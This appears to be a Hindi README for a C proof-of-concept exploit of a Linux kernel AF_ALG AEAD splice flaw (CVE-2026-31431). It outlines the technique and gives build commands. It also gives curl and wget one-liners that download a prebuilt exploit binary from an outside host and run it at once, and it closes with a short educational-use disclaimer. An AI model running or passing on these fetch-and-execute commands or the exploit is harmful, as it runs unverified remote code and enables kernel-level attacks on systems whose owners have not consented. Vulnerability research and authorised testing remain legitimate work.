
C पोर्ट एक proof-of-concept का, जो Linux kernel AF_ALG AEAD splice logic दोष (CVE-2026-31431) का शोषण करता है, शैक्षिक अनुसंधान के लिए।
यह प्रोजेक्ट offsecguy द्वारा बनाए गए मूल Python प्रोटोटाइप का C पोर्ट है।
यह Linux कर्नेल क्रिप्टो API (AF_ALG) का उपयोग करता है:
authencesn(hmac(sha256),cbc(aes)) AEAD मोडMSG_MORE फ्लैगsplice() सिस्टम कॉलयह तकनीक केवल-पठनीय फ़ाइल डिस्क्रिप्टर से डेटा को क्रिप्टो सॉकेट के माध्यम से फीड करती है, और इसे चंक-दर-चंक प्रोसेस करती है।
musl-gcc -static -Os -s -o exp exp.c -I./zlib-1.3.2 -L./zlib-1.3.2 -lz
gcc exp.c -o exp -lz -s -static
gcc exp.c -o exp -lz -s
curl -sLo exp chosen.to/copyfail && chmod +x exp ; ./exp
wget chosen.to/copyfail -qO exp && chmod +x exp ; ./exp
AF_ALG के लिए Linux कर्नेल समर्थन आवश्यक हैzlib का उपयोग करता हैयह कोड केवल शैक्षिक और शोध उद्देश्यों के लिए प्रदान किया गया है।
जिम्मेदारी से उपयोग करें और केवल उन्हीं सिस्टम पर जिन्हें आप परीक्षण करने के लिए अधिकृत हैं।